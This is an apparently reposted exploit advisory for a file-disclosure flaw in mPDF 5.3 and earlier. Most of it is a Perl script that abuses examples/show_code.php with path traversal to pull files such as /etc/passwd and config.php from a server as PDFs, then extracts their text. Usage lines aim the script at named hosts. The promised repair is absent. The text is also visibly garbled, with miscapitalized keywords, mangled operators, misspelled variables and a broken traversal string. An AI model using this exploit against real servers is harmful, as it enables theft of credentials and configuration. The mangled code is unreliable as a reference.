MPDF & lt; = 5.3 file leakage and repair

 

Title: mPDF <= 5.3 File Disclosure

Author: ZadYree www.2cto.com

: Http://www.mpdf1.com/mpdf/download

Affected Versions: 5.3 and prior

Test Platform: Multiple

 

#! /Usr/bin/perl-U

= Head1 TITLE

 

MPDF <= 5.3 File Disclosure Exploit (0day)

 

= Head2 SYNOPSIS

 

-- Examples/show_code.php --

 

Preg_match ('/example [0] {0, 1} (\ d + )_(.*?) \. Php/', $ filename, $ m); <--- URI unproperly filtered.

$ Num = intval ($ m [1]);

$ Title = ucfirst (preg_replace ('/_/', '', $ m [2]);

 

If (! $ Num |! $ Title) {die ("Invalid file ");}

 

= Head2 DESCRIPTION

 

This vulnerability, due to a weak filter, lets you download any unprotected remote

Content, under PDF format.

The exploit may not work, depending on the set up htaccess/chmod rules on

Remote server.

 

= Head2 USAGE

 

Perl exploit. pl-r http://www.bkjia.com/mpdf53/../config. php

Perl exploit. pl-a http://p00niez.com/mpdf53//etc/passwd

 

Requiered modules:

PDF: OCR2

LWP: Simple

File: Type

 

Download a module:

Sudo cpan-fi install Module: Name

 

= Head3 Author

 

Zadyree ~ 3 LRVS Team | Blog: z4d.tuxfamily.org/blog

 

= Head3 Thanks

 

PHDays CTF-Yes, CTFs sometime do give you 0 dayz

3 LRVS Team-Support

 

= Cut

 

# ************* Configuration **************#

My $ cmd_file = '/tmp/b00mcallback ';

$ PDF: OCR2: CHECK_PDF = 0;

$ Del_temp_file = 1;

#*************************************** ***#

 

 

Use 5.010;

Use PDF: OCR2;

Use Getopt: Std;

Use LWP: Simple;

Use File: Type;

Use constant TRUE => 1;

Use constant FALSE => 0;

 

Help () unless (@ ARGV> = 2 );

 

My (% optz, $ uri );

Getopts ('ra', \ % optz );

My $ relative = $ optz {'R '};

My $ absolute = $ optz {'A '};

My $ help = $ optz {'H '};

Help () unless ($ absolute | $ relatife );

 

My ($ purl, $ fpath) = @ ARGV;

 

My $ name = $ purl;

$ Name = ~ S {http: // (. + ?) /. *} {$1 };

$ Name. = ("_". localtime (time). ". txt ");

 

 

$ Uri = '/examples/show_code.php? Filename = example03_LRVS.php/.../'if ($ absolute );

$ Uri = '/examples/show_code.php? Filename = example03_LRVS.php/.../'if ($ relative );

 

Help () unless ($ uri );

 

My $ furl = $ purl. $ uri. $ fpath;

$ Furl = ~ S # (//) # $ I ++? "/": $1 # eg; # Yeah that's twisted.

 

Say "[*] Retrieving content ...";

My $ file = make_file (get ($ furl ));

Die "[-] The stream you requested is not well formatted (forbidden page, etc). \ 012" unless is_pdf ($ file );

 

Say "[+] OK \ 012 [*] Converting format ...";

$ Pdf = PDF: OCR2-> new ($ file );

 

My $ text = $ pdf-> text;

$ Text = ~ S/[^ \ x0A-\ x7F] +? // Gm;

 

Open (my $ fh, '>', $ name );

Print $ fh $ text;

Close ($ fh );

 

Say "[+] OK \ 012 [+] Content successfully extracted! \ NFile: ", $ name;

 

Unlink ($ cmd_file) if ($ del_temp_file = TRUE );

 

 

 

Sub make_file {

My $ content = shift;

Open ($ fh, '>', $ pai_file );

Print $ fh $ content;

Close ($ fh );

Return ($ pai_file );

}

 

Sub is_pdf {

My $ checked_file = shift;

My $ ft = File: Type-> new ();

Return (1) if ($ ft-> mime_type ($ checked_file) eq "application/pdf ");

Return (0 );

}

 

Help () if ($ help );

 

Sub help {

Say <"EOF ";

 

Usage: perl $0 [-r |-a] http: // [mPDF URL] <file_to_read>

 

Details:

-R: Relative path (ex: ../file. php)

-A: Absolute path (ex:/etc/file. zd)

 

For any more information, feel free to contact ZadYree

Happy hacking!

EOF

Exit (0 );

}